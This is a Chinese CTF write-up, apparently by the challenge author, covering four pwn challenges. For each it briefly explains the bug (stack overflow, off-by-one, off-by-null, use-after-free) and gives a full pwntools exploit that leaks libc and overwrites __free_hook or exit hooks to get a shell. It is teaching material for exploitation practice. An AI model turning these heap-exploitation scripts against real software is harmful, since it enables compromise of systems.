0%

长安战疫pwn

长安战疫pwn wp

pwn1

pwn签到题,唯一有点坑就是在出函数时并不仅仅是leave;ret,而是多出了两行汇编代码。因此需要我们分析和调试一下。

7Fg7qg.png

exp

1
2
3
4
5
6
7
from pwn import *
io=process('pwn1')
io.recvuntil(":")
stack = int(io.recv(10),16)
gdb.attach(io)
io.sendline('a'*0x30+p32(0x8048540)+p32(stack+0x34))
io.interactive()

pwn2

libc-2.27的off-by-one,细心一点就能发现for循环这块会让我们多输入一个字节。

7FgLIs.png

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
io=process('./pwn2')
elf=ELF('./pwn2')
libc=elf.libc
#libc=ELF('./libc-2.27.so')
context.log_level='debug'

def add(size,content):
io.sendlineafter('Choice: ','1')
io.sendlineafter('size: ',str(size))
io.sendafter('content: ',content)

def edit(index,content):
io.sendlineafter('Choice: ','2')
io.sendlineafter('idx: ',str(index))
io.sendlineafter('content: ',content)

def dele(index):
io.sendlineafter('Choice: ','3')
io.sendlineafter('idx: ',str(index))

def show(index):
io.sendlineafter('Choice: ','4')
io.sendlineafter('idx: ',str(index))

def exp():
add(0xf8,'f1ag\n')#0
add(0xf8,'f1ag\n')#1
add(0xf8,'f1ag\n')#2
add(0xf8,'f1ag\n')#3
add(0x18,'f1ag\n')#4
dele(2)
add(0xf8,'a'*0xf0+p64(0x300)+'\n')#2

for i in range(7):
add(0xf8,'a\n')#5~11
for i in range(7):
dele(11-i)

dele(0)
gdb.attach(io)
dele(3)
for i in range(7):
add(0xf8,'f1ag\n')#0,3,5~9
add(0xf8,'f1ag\n')#10
show(1)
malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-16
libc_base = malloc_hook - libc.symbols['__malloc_hook']
print('libc_base',hex(libc_base))
free_hook = libc.symbols['__free_hook'] + libc_base
system = libc.symbols['system'] + libc_base

add(0xf8,'f1ag\n')#11=1
dele(1)
edit(11,p64(free_hook-8)+'\n')
add(0xf8,'f1ag\n')#1
add(0xf8,'/bin/sh\x00'+p64(system)+'\n')#12
dele(12)
io.interactive()
exp()

pwn3

这个题利用的是strcpy、strcat等一些对字符串操作的函数的漏洞,当他们复制字符串的时候会把字符串的最后一个字节\x00给带上,极容易造成off-by-null漏洞。而这个题的漏洞点正在于此,\x00正好将存放长度的地址覆盖置0,就可以将长度的值改写为一个很大的值,打败boss进入到奖励函数中。

7Fgqaj.png

因为有exit函数,很容易联想到打exit_hook。[exit_hook的知识点]( PWN学习—exit_hook-偷家 - BlackBird’s Blog (blackbird-bb.github.io) ) 参考这位西电大佬写的博客,然后直接打onegadget就ok了。在打one_gadget的时候正常出来的四个gadget不能打通,这时候在one_gadget后加上-l2可以找到更多的gadget。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
#io=process('./Gpwn3')
io=remote('127.0.0.1',10002)
elf=ELF('./Gpwn3')
libc=ELF('./libc-2.23.so')
context.log_level='debug'

def create(description):
io.sendlineafter('choice:','1')
io.sendafter(' level :\n',description)

def power(description):
io.sendlineafter('choice:','2')
io.sendafter('another level :',description)

def beat():
io.sendlineafter('choice:','3')

def give_up():
io.sendlineafter('choice:','4')

def exp():
create('a'*35+'\n')
power('a')
power('\xff\xff\xff\xff')
beat()

io.recvuntil('reward: ')
puts=int(io.recv(14),16)
libc_base=puts-libc.symbols['puts']
print('libc_base',hex(libc_base))
system=libc_base+libc.symbols['system']
binsh=libc_base+libc.search('/bin/sh').next()
dl_rtld_unlock_recursive = libc_base+0x5f0040+3856
gadget=[0x45226,0x4527a,0xf03a4,0xf1247,0xcd173,0xcd248,0xf03b0,0xf67f0]
#gdb.attach(io)
io.sendafter('your name:',p64(dl_rtld_unlock_recursive))

io.sendafter('for you!',p64(gadget[7]+libc_base))
io.interactive()
exp()

pwn4

这个题有个小问题,忘了在add函数后加break跳出switch,因此有师傅修switch时修不出来add,只能看汇编代码,在这里和各位师傅道个歉。

此题的漏洞在free时没有对指针置0,libc-2.31的uaf。

7FgbZQ.png

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
io=process('./pwn4')
elf=ELF('./pwn4')
libc=elf('./libc-2.31.so')
context.log_level='debug'

def add(index,name,key,value):
io.sendlineafter('Your choice: ','1')
io.sendlineafter('Your index: ',str(index))
io.sendlineafter('Enter your name: ',name)
io.sendlineafter('Please input a key: ',key)
io.sendlineafter('Please input a value: ',str(value))

def show(index):
io.sendlineafter('Your choice: ','2')
io.sendlineafter('Your index: ',str(index))

def edit(index,name,length,key,value):
io.sendlineafter('Your choice: ','3')
io.sendlineafter('Your index: ',str(index))
io.sendlineafter('Enter your name: ',name)
io.sendlineafter('New key length: ',str(length))
io.sendlineafter('Key: ',key)
io.sendlineafter('Value: ',str(value))

def dele(index):
io.sendlineafter('Your choice: ','4')
io.sendlineafter('Your index: ',str(index))

def exp():
add(0,'f1ag','a'*0x417,0)
add(1,'f1ag','a'*0x3c7,1)
dele(0)
show(0)
malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 96 -16
libc_base = malloc_hook - libc.symbols['__malloc_hook']
print('libc_base',hex(libc_base))
free_hook = libc.symbols['__free_hook'] + libc_base
system = libc.symbols['system'] + libc_base

add(2,'f1ag','a'*0x57,2)
add(3,'f1ag','a'*0x57,3)
dele(3)
dele(2)
#gdb.attach(io)
edit(1,'f1ag',8,'/bin/sh\x00',1)
edit(2,'f1ag',6,p32((free_hook-0x51)&0xffffffff)+p16(((free_hook)>>32)&0xffff),2)

add(4,'f1ag','a'*0x51+p32((system)&0xffffffff)+p16(((system)>>32)&0xffff),'4')

#add(6,'f1ag',p64(system),5)

dele(1)
io.interactive()
exp()